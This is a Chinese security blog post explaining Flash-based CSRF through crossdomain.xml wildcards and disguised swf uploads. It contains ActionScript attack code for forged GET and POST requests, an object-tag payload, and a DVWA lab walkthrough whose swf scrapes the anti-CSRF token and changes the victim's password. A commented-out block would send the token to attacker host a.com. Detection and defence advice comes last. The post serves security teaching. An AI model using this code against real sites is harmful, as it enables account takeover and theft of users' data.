<li><a href="/2019/01/01/HITB_Binary_100_writeup/">HITB Binary 100 writeup</a></li>
</ul>
</li>
</ul>
</li>
<li><strong>渗透测试</strong><ul>
<li>基础&amp;Tricks</li>
<li>Kali</li>
<li>Metasploit</li>
<li>内网渗透</li>
<li>提权<ul>
<li><a href="/2019/01/01/关于本地提权的学习笔记（一）：Administrator提权到System">Administrator提权到System</a></li>
<li><a href="/2019/01/01/关于本地提权的学习笔记（二）：注入进程和利用漏洞提权">注入进程和利用漏洞提权</a></li>
</ul>
</li>
<li>免杀</li>
<li>工具</li>
</ul>
</li>
<li><strong>OS</strong><ul>
<li>Windows<ul>
<li><a href="/2019/01/01/将Python脚本转换为exe">将Python脚本转换为exe</a></li>
<li><a href="/2019/01/01/几个查看用户信息的Windows程序">几个查看用户信息的Windows程序</a></li>
</ul>
</li>
<li>Linux</li>
</ul>
</li>
</ul>

  </div>
</div>
</div>

<header class="post-header text-center">
	<h1 class="title">
		Flash型CSRF总结
	</h1>
	<span class="read">
		阅读量 <span id="busuanzi_value_page_pv"></span>
	</span>
</header><br>

<div class="book-post">
  <h2 id="0x01-基本原理"><a href="#0x01-基本原理" class="headerlink" title="0x01 基本原理"></a>0x01 基本原理</h2><p>Flash功能丰富，我们可以使用其API来向任意站点发送请求，而且发送的请求会继承当前浏览器的会话。换句话说，我们可以利用Flash而非JavaScript来控制浏览器向目标URL发送请求，从而实现Flash CSRF攻击。</p>
<p>我们知道，通过Flash请求外部资源时，会先访问外域是否存在crossdomain.xml且判断Flash当前域是否在allow-access-from标签配置的domain内。当domain的值为通配符*时，表明该站资源对所有外域开放，等同于舍弃了Flash层面的同源策略的限制。</p>
<p>Flash CSRF在于：如果目标站点的crossdomain.xml中domain值为*或者其中某些domain下的站可被攻击者利用来上传Flash文件等，那么攻击者可以诱使受害者用户访问攻击页面，进而通过触发Flash请求某个用户当前浏览器已登录的页面，从中提取出CSRF的token或者页面的其他敏感信息，造成CSRF攻击。</p>
<h2 id="0x02-攻击场景"><a href="#0x02-攻击场景" class="headerlink" title="0x02 攻击场景"></a>0x02 攻击场景</h2><p>使用Flash来发起CSRF攻击，一般用于绕过一些特定情形，下面就列两个常见的。</p>
<h3 id="场景1——绕过Referer等HTTP头字段检测"><a href="#场景1——绕过Referer等HTTP头字段检测" class="headerlink" title="场景1——绕过Referer等HTTP头字段检测"></a>场景1——绕过Referer等HTTP头字段检测</h3><p>很多时候，Web站点后台会对Referer字段进行校验，但是有时候会出现未校验无Referer字段等情况的缺陷。</p>
<p>用Flash发起的CSRF，可以去掉HTTP头中的Referer字段，从而可以绕过校验Referer字段（但未校验空Referer）来防御CSRF攻击的机制。除此之外，还能去掉Origin字段。</p>
<p>攻击原理和CSRF一样的，只不过从经典的伪造表单变成了触发swf文件的形式：</p>
<ol>
<li>攻击者编写恶意的Flash文件，用于从目标敏感页面中获取受害者的敏感信息或者获取页面的token值；</li>
<li>攻击者将该Flash文件上传至自己的服务器中，并诱使受害者访问加载该恶意Flash文件的页面；</li>
<li>受害者访问目标敏感页面后，在同一浏览器中被诱使访问攻击者服务器加载了恶意Flash文件的页面，此时的访问是会带上受害者在目标页面的会话的；</li>
<li>由于无Referer字段，Bypass了目标站点后台的CSRF防御机制，成功获取到页面token或用户敏感信息，实现了CSRF攻击；</li>
</ol>
<p>下面举两个不同方式的Demo。</p>
<h4 id="GET方式"><a href="#GET方式" class="headerlink" title="GET方式"></a>GET方式</h4><p>首先攻击者发现目标站点的crossdomain.xml存在Flash型CSRF风险：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version="1.0"?&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">cross-domain-policy</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">allow-access-from</span> <span class="attr">domain</span>=<span class="string">"*"</span>/&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">cross-domain-policy</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>然后攻击者编写恶意Flash，用于在目标页面进行危险敏感的GET操作：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">function CSRF():void</span><br><span class="line">&#123;</span><br><span class="line">	var urlLoader:URLLoader=new URLLoader();</span><br><span class="line">	var request:URLRequest=new URLRequest();</span><br><span class="line">	request.url=&quot;http://a.com/m7.php&quot;;</span><br><span class="line">	request.method=URLRequestMethod.GET;</span><br><span class="line">	request.data=&quot;user=admin&amp;msg=GET_secret_content&quot;;</span><br><span class="line">	urlLoader.load(request);</span><br><span class="line">	&#125;</span><br><span class="line">CSRF();</span><br></pre></td></tr></table></figure>
<p>编译为swf文件后放置到攻击者的Web目录，然后诱使受害者访问，即可向目标站点通过GET方式带上受害者当前访问该页面的浏览器会话来发送敏感操作的请求：</p>
<p><img src="/2019/07/28/Flash型CSRF总结/3.png" alt=""></p>
<p><img src="/2019/07/28/Flash型CSRF总结/1.png" alt=""></p>
<h4 id="POST方式"><a href="#POST方式" class="headerlink" title="POST方式"></a>POST方式</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">import flash.net.URLRequest;</span><br><span class="line">import flash.system.Security;</span><br><span class="line">var url = new URLRequest(&quot;http://a.com/m7.php&quot;);</span><br><span class="line">var shellcode = new URLVariables();</span><br><span class="line">shellcode = &quot;user=admin&amp;msg=POST_hacker_content&quot;;</span><br><span class="line">url.method = &quot;POST&quot;;</span><br><span class="line">url.data = shellcode;</span><br><span class="line">sendToURL(url);</span><br><span class="line">stop();</span><br></pre></td></tr></table></figure>
<p>诱使受害者访问攻击者的页面后，触发Flash向目标页面发起POST请求，进行危险的操作：</p>
<p><img src="/2019/07/28/Flash型CSRF总结/4.png" alt=""></p>
<p><img src="/2019/07/28/Flash型CSRF总结/2.png" alt=""></p>
<p>可以明显看到，请求报文并没有Referer字段。</p>
<h3 id="场景2——上传Flash到目标站点绕过crossdomain"><a href="#场景2——上传Flash到目标站点绕过crossdomain" class="headerlink" title="场景2——上传Flash到目标站点绕过crossdomain"></a>场景2——上传Flash到目标站点绕过crossdomain</h3><p>有个知识点——Flash并不关心扩展名或者Content-Type。如果使用object标签嵌入文件，只要文件内容为有效的Flash文件，它就会被当作是Flash文件来执行。</p>
<p>简单说下利用过程：</p>
<ol>
<li>攻击者发现目标站点的crossdomain.xml中domain设置并不为*，而是几个其他域名；</li>
<li>攻击者搜索几个白名单域名中的子域名，寻找可上传文件的域名，如victim.com中允许上传图片文件，但校验了文件后缀名和Content-Type；</li>
<li>攻击者创建恶意Flash文件，并修改后缀名为jpg，然后通过篡改Content-Type将其上传到victim.com中；</li>
<li>获取到上传文件的地址后，攻击者使用类型为application/x-shockwave-flash的object标签将文件嵌入到攻击者服务器中，如attacker.com；</li>
<li>受害者访问了victim.com，然后在同一浏览器中被诱使访问attacker.com，触发了攻击者上传的恶意Flash，从而可使攻击者窃取CSRF的token或目标站点页面的敏感信息，实现CSRF攻击；</li>
</ol>
<p>类似的payload如下：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">object</span> <span class="attr">style</span> = <span class="string">"height ：1px ; width ：1px ; "</span> <span class="attr">data</span> = <span class="string">"http://victim.com/user/2292/profilepicture.jpg"</span> <span class="attr">type</span> = <span class="string">"application / x-shockwave-flash"</span> <span class="attr">allowscriptaccess</span> = <span class="string">"always"</span> <span class="attr">flashvars</span> = <span class="string">"c = read＆u = http://victim.com/secret_file.txt"</span> &gt;</span> <span class="tag">&lt;/<span class="name">object</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>实际攻击利用案例可直接看如下链接，该作者发现了Paypal的Flash CSRF漏洞并在YouTube上进行了漏洞利用的演示：</p>
<p><a href="https://blog.h3xstream.com/2015/04/crossdomainxml-beware-of-wildcards.html" target="_blank" rel="noopener">https://blog.h3xstream.com/2015/04/crossdomainxml-beware-of-wildcards.html</a></p>
<h2 id="0x03-攻击案例"><a href="#0x03-攻击案例" class="headerlink" title="0x03 攻击案例"></a>0x03 攻击案例</h2><p>下面以DVWA的Low级和High级的场景为例进行Flash CSRF的攻击利用。</p>
<h3 id="GET型无Anti-CSRF-token"><a href="#GET型无Anti-CSRF-token" class="headerlink" title="GET型无Anti-CSRF token"></a>GET型无Anti-CSRF token</h3><p>我们知道，Low级的场景非常简单，表单参数通过GET方式传入，无CSRF-token防御机制，也无校验当前密码：</p>
<p><img src="/2019/07/28/Flash型CSRF总结/5.png" alt=""></p>
<p>首先，我们查看到目标站点是存在crossdomain.xml文件的，且domain设置为*，明显存在Flash CSRF风险：</p>
<p><img src="/2019/07/28/Flash型CSRF总结/6.png" alt=""></p>
<p>接着，我们根据前面看到的表单将前面场景1中的GET方式的代码稍微改下即可：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">function CSRF():void</span><br><span class="line">&#123;</span><br><span class="line">	var urlLoader:URLLoader=new URLLoader();</span><br><span class="line">	var request:URLRequest=new URLRequest();</span><br><span class="line">	request.url=&quot;http://a.com/dvwa/vulnerabilities/csrf/index.php&quot;;</span><br><span class="line">	request.method=URLRequestMethod.GET;</span><br><span class="line">	request.data=&quot;password_new=hacker&amp;password_conf=hacker&amp;Change=Change&quot;;</span><br><span class="line">	urlLoader.load(request);</span><br><span class="line">	&#125;</span><br><span class="line">CSRF();</span><br></pre></td></tr></table></figure>
<p>编译成swf文件后，放置到我们自己的服务器中，然后诱使受害者访问我们的恶意swf文件；如果受害者在此之前在同一浏览器中登录了目标站点，那么就会成功触发Flash CSRF攻击，从而密码被篡改：</p>
<p><img src="/2019/07/28/Flash型CSRF总结/7.png" alt=""></p>
<p>这里看到，受害者被诱导访问我们服务器上的恶意swf文件后，Flash先向目标服务器访问请求是否存在crossdomain.xml且是否允许当前域访问，当OK后就发送GET方式的恶意表单请求篡改密码。这里注意到右侧的HTTP头字段，由Flash发起的请求会带上用户的会话，Referer为Flash文件所在的地址，同时会添加一个x-flash-version字段用于标志Flash版本信息。</p>
<p>我们发送恶意链接诱使受害者点击访问，自己大概估算个受害者点击访问的时间后，使用admin/hacker用户名密码即可登录成功。</p>
<h3 id="GET型含Anti-CSRF-token"><a href="#GET型含Anti-CSRF-token" class="headerlink" title="GET型含Anti-CSRF token"></a>GET型含Anti-CSRF token</h3><p>在前面的基础上，High级添加了Anti-CSRF token机制，即在修改密码的表单处添加了一项隐藏的token，当用户每次访问改密页面时，服务器会返回一个随机的token，向服务器发起请求时，需要提交token参数，而服务器在收到请求时，会优先检查token，只有token正确，才会处理客户端的请求：</p>
<p><img src="/2019/07/28/Flash型CSRF总结/8.png" alt=""></p>
<p>这时就比Low级多了一步，需要先获取当前表单页面的Anti-CSRF token值，再一起发送篡改密码的请求。</p>
<p>这里我们编写恶意swf文件，主要添加了先让受害者请求表单页面，将返回的响应内容通过正则表达式来匹配出此时Anti-CSRF token的值，然后添加上token参数一同发送GET方式表单请求篡改密码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">//获取当前页面user_token</span><br><span class="line">var targetURL:String = &quot;http://192.168.43.201/dvwa/vulnerabilities/csrf/index.php&quot;;</span><br><span class="line">var request:URLRequest = new URLRequest(targetURL);</span><br><span class="line">request.method = URLRequestMethod.GET;</span><br><span class="line">request.data = &quot;&quot;;</span><br><span class="line">sendToURL(request);</span><br><span class="line">var loader:URLLoader=new URLLoader();</span><br><span class="line">loader.addEventListener(Event.COMPLETE,completeHandler);</span><br><span class="line">function completeHandler(event:Event):void&#123;</span><br><span class="line">var user_token:String = loader.data.match(&quot;user_token&apos; value=&apos;(.*?)&apos;&quot;)[1];</span><br><span class="line"></span><br><span class="line">//将token发回</span><br><span class="line">//var targetURL2:String = &quot;http://a.com/gettoken.php&quot;;</span><br><span class="line">//var request2:URLRequest = new URLRequest(targetURL2);</span><br><span class="line">//request2.method = URLRequestMethod.POST;</span><br><span class="line">//request2.data = &quot;user_token=&quot; + user_token;</span><br><span class="line">//sendToURL(request2);</span><br><span class="line"></span><br><span class="line">//发起CSRF攻击，篡改密码</span><br><span class="line">var request3:URLRequest = new URLRequest(targetURL);</span><br><span class="line">request3.method = URLRequestMethod.GET;</span><br><span class="line">request3.data = &quot;password_new=hacker&amp;password_conf=hacker&amp;Change=Change&amp;user_token=&quot; + user_token;</span><br><span class="line">sendToURL(request3);</span><br><span class="line">&#125;</span><br><span class="line">loader.load(request);</span><br></pre></td></tr></table></figure>
<p>和Low级一样的原理，不再累赘，看看效果。</p>
<p>当受害者访问的是low.swf文件时，该文件时不带token的，会修改失败，302重定向回之前的页面：</p>
<p><img src="/2019/07/28/Flash型CSRF总结/9.png" alt=""></p>
<p>当受害者访问的是high.swf文件时，带上了token参数，成功进行了密码的篡改：</p>
<p><img src="/2019/07/28/Flash型CSRF总结/10.png" alt=""></p>
<h2 id="0x04-检测方法"><a href="#0x04-检测方法" class="headerlink" title="0x04 检测方法"></a>0x04 检测方法</h2><p>检查网站的crossdomain.xml文件，如果allow-access-from标签中domain值设置为*则可能存在Flash CSRF漏洞；如果设置domain值为多个外域，需要人工分析是否存在风险。</p>
<h2 id="0x05-防御方法"><a href="#0x05-防御方法" class="headerlink" title="0x05 防御方法"></a>0x05 防御方法</h2><ul>
<li>当站点不需要跨域请求资源时，尽量删除crossdomain.xml文件；</li>
<li>若需crossdomain.xml文件，则必须严格设置allow-access-from标签中domain的白名单；</li>
</ul>
<h2 id="0x06-参考"><a href="#0x06-参考" class="headerlink" title="0x06 参考"></a>0x06 参考</h2><p><a href="https://labs.detectify.com/2014/05/20/the-lesser-known-pitfalls-of-allowing-file-uploads-on-your-website/" target="_blank" rel="noopener">The lesser known pitfalls of allowing file uploads on your website</a></p>
<p><a href="https://blog.h3xstream.com/2015/04/crossdomainxml-beware-of-wildcards.html" target="_blank" rel="noopener">crossdomain.xml : Beware of Wildcards</a></p>
<p><a href="http://www.vuln.cn/6205" target="_blank" rel="noopener">Flash CSRF – _Dy</a></p>

</div>

<br>
<div><center>
  <span>Copyright &copy; Mi1k7ea</span>  |  <span id="busuanzi_container_site_uv">本站总访问量 <span id="busuanzi_value_site_uv"></span> 次</span>
</center></div>


  <div class="book-comments">
    




  </div>


<script src="/js/book-post.js"></script>
        </div>
      </div>

      <div class="column col-2 hide-lg">
        <div class="book-toc">
  <div class="book-tocbot">
  </div>
  <div class="book-tocbot-menu">
    <a class="book-toc-expand" onclick="expand_toc()">Expand all</a>
    <a onclick="go_top()">Back to top</a>
    <a onclick="go_bottom()">Go to bottom</a>
  </div>
</div>

<script>
tocbot.init({
  tocSelector: '.book-tocbot',
  contentSelector: '.book-post',
  headingSelector: 'h1, h2, h3, h4, h5',
  collapseDepth: 2,
  orderedList: false,
  scrollSmooth: false,
});

function expand_toc(){
  var b = document.querySelector(".book-toc-expand");
  tocbot.init({
    tocSelector: '.book-tocbot',
    contentSelector: '.book-post',
    headingSelector: 'h1, h2, h3, h4, h5',
    collapseDepth: 6,
    orderedList: false,
    scrollSmooth: false,
  });
  b.setAttribute("onclick", "collapse_toc()");
  b.innerHTML = "Collapse all"
}

function collapse_toc(){
  var b = document.querySelector(".book-toc-expand");
  tocbot.init({
    tocSelector: '.book-tocbot',
    contentSelector: '.book-post',
    headingSelector: 'h1, h2, h3, h4, h5',
    collapseDepth: 2,
    orderedList: false,
    scrollSmooth: false,
  });
  b.setAttribute("onclick", "expand_toc()");
  b.innerHTML = "Expand all"
}

function go_top() {
  window.scrollTo(0, 0);
}

function go_bottom() {
  window.scrollTo(0, document.body.scrollHeight);
}

</script>
      </div>
    </div>
  </div>
</div>

</body>
</html>
